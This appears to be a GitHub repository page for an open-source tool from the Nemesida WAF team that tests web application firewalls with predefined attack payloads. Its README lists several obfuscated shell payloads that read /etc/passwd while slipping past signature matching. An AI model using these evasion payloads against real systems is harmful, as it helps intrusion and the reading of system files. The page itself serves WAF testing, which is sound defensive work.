Skip to content

ioan1iuga/waf-bypass

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

66 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

WAF Bypass Tool

WAF Bypass by Nemesida WAF team (nemesida-waf.com) is an open source tool (Python3) to check any WAF for the number of False Positives/False Negative using predefined payloads (if desired, the set of payloads can be changed). Turn off ban mode before use.

A script developed for internal needs, including for testing Nemesis WAF and Nemesida WAF Free, but you can use it to test any WAF.

When using, do not violate the law. We are not responsible for the use of the program.

WAF Bypass Script

There are attacks for which it is impossible to create a signature, while not increasing the number of false positives. Therefore, it is absolutely normal that Nemesida WAF Free bypass the attack, and the commercial version of Nemesida WAF Free blocks. For example, we can execute the cat /etc/passwd command in the following ways:

%2f???%2f??t%20%2f???%2fp??s??
cat+/e't'c/pa'ss'wd
e'c'ho 'swd test pentest' | awk '{print "cat /etc/pas"$1}' | bash
ec'h'o 'cat /etc/examplewd' | sed 's/example/pass/g' | bash

How to run

Run from Docker

The latest waf-bypass always available via the Docker Hub. It can be easily pulled via the following command:

# docker pull nemesida/waf-bypass

Run with the command:

# docker run nemesida/waf-bypass --host='example.com'
or
# docker run nemesida/waf-bypass --host='example.com' --proxy='http://proxy.example.com:3128'

Run source code from GitHub

# git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
# python3 -m pip install -r /opt/waf-bypass/requirements.txt

# python3 /opt/waf-bypass/main.py --host='example.com'
or
# python3 /opt/waf-bypass/main.py --host='example.com' --proxy='http://proxy.example.com:3128'

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published